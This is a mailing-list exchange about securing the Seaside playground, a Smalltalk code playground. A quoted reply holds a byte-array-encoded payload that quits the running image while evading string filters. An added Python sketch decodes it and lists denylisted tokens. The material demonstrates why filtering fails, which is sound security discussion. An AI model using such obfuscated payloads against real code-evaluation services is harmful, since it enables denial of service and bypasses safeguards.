[Seaside] Seaside playground

Gerhard Obermann obi068 at gmail.com
Mon Jan 11 09:41:43 UTC 2010


Are there any options to make it really secure?

Gerhard

On Mon, Jan 11, 2010 at 10:13 AM, Lukas Renggli <renggli at gmail.com> wrote:

> > That's not a simple hack.
> > And it doesn't really take over the computer.
>
> Sure. As soon as I can execute arbitrary Smalltalk code on your
> machine, I can deploy a Trojan for your platform.
>
> > Anyway, such hacks are not possible anymore.
>
> There is an infinite number of other hacks. It gets harder over time,
> but the one below is particularly simple:
>
> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>
> My point is that no matter how much time you spend on making it secure
> by checking for particular patterns or strings, there will always be
> ways to fool it. In the Smalltalk world security is inherently weak,
> mostly because of the strong reflective capabilities. I would really
> love to see your application on the web, but in its current form we
> won't be able to run it on seaside.st.
>
> Lukas
>
> --
> Lukas Renggli
> http://www.lukas-renggli.ch
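Added example, not part of the original thread or of the playground's code: a Python sketch of the point made in the quoted message, comparing what a text denylist sees in the quoted snippet with what its byte-array literal decodes to. The denylist tokens and all function names are assumptions; the thread does not say what the playground actually checked. Decoding this one encoding helps a reviewer read a submission, but it does not turn the filter into a security boundary.

```python
import re

# Hypothetical denylist; the thread does not say what the playground checked.
DENYLIST = ("SmalltalkImage", "snapshot:", "andQuit:")

# The snippet from the quoted message, copied as posted (quote markers removed).
SUBMITTED = """html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString"""

# Smalltalk byte-array literal: #[ followed by decimal byte values and ]
BYTE_ARRAY = re.compile(r"#\[([\d\s]*)\]")


def naive_filter_hits(source):
    """Denylisted tokens that appear literally in the given text."""
    return [tok for tok in DENYLIST if tok in source]


def decode_byte_arrays(source):
    """Decode every #[...] literal to text so a reviewer can read it."""
    decoded = []
    for match in BYTE_ARRAY.finditer(source):
        values = [int(v) for v in match.group(1).split()]
        if all(v < 256 for v in values):  # skip literals that are not valid bytes
            decoded.append(bytes(values).decode("latin-1"))
    return decoded


def review(source):
    """Compare the filter's view of the raw text with the decoded literals."""
    literals = decode_byte_arrays(source)
    hidden = sorted({tok for text in literals for tok in naive_filter_hits(text)})
    return {
        "raw_hits": naive_filter_hits(source),  # what the string filter sees
        "decoded": literals,                    # what would be evaluated
        "hidden_hits": hidden,                  # tokens only visible after decoding
    }


if __name__ == "__main__":
    for key, value in review(SUBMITTED).items():
        print(key, "->", value)
```

The raw text produces no denylist hits, while the decoded literal contains all three tokens: the code that is evaluated never appears in the text the filter inspects.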

